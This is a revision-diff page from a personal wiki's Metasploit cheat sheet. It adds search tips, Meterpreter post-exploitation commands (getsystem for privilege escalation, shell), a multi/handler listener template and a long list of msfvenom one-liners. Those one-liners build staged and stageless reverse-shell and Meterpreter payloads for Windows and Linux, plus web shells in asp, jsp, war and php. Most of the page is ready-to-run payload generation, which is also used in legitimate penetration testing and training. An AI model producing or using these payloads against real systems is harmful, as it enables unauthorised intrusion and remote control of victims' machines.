The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools

You are here: start » cheat_sheets_metasploit
cheat_sheets_metasploit

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
cheat_sheets_metasploit [2022/12/31 00:42] – [Modules & Categories] gmancheat_sheets_metasploit [2022/12/31 21:50] (current) – [Two Common Commands] gman
Line 49: Line 49:
   * Example, CVE: ''search ms17-101''   * Example, CVE: ''search ms17-101''
   * Example, type: ''search type:auxiliary telnet''   * Example, type: ''search type:auxiliary telnet''
 +
 +**Alternative Search Option:** Rapid7 maintains a [[https://www.rapid7.com/db/?type=metasploit | searchable web-based exploit database]]. Find your exploit there and tell msf to use it.
  
 ''info'' - To see more information on the loaded module. You can see info on any module at any time by using the command ''info'' followed by the full path the module you need info on. ''info'' - To see more information on the loaded module. You can see info on any module at any time by using the command ''info'' followed by the full path the module you need info on.
  
-**Search Parameters (Keywords):**+**Parameters (Keywords):**
  
 ^  Keyword    Description                              ^ ^  Keyword    Description                              ^
Line 192: Line 194:
  
 ---- ----
 +
 +===== Syntax (Examples) =====
 +
 +==== Two Common Commands ====
 +
 +After a successful exploit (and assuming your payload was Meterpreter), two common commands you will likely often want to try: 
 +
 +<code>
 +# priv esc to admin
 +getsystem
 +
 +# get a shell in the exploit directory on the target
 +shell
 +</code>
 +
 +
 +==== msfvenom ====
 +
 +See [[cheat_sheets_various#msfvenom | here]].       
 +
 +==== MSF Handler ====
 +
 +''msfconsole''...Handlers should be in the following format:
 +
 +<code>
 +use exploit/multi/handler
 +set PAYLOAD <Payload name>
 +set LHOST <LHOST value>
 +set LPORT <LPORT value>
 +</code>
 +
 +==== Non-Meterpreter Binaries ====
 +
 +**Staged Payloads for Windows**
 +
 +<code>
 +# x86
 +msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Stageless Payloads for Windows**
 +
 +<code>
 +# x86
 +msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Staged Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +**Stageless Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +==== Non-Meterpreter Web Payloads ====
 +
 +<code>
 +# asp 
 +msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
 +
 +# jsp
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
 +
 +# war
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
 +
 +# php
 +msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
 +</code>
 +
 +==== Meterpreter Binaries ====
 +
 +**Staged Payloads for Windows**
 +
 +<code>
 +
 +# x86
 +msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Stageless Payloads for Windows**
 +
 +<code>
 +# x86
 +msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Staged Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +**Stageless Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +==== Meterpreter Web Payloads ====
 +
 +<code>
 +# asp
 +msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
 +
 +# jsp
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp
 +
 +# war
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war
 +
 +# php
 +msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
 +</code>
  
cheat_sheets_metasploit.1672447327.txt.gz · Last modified: by gman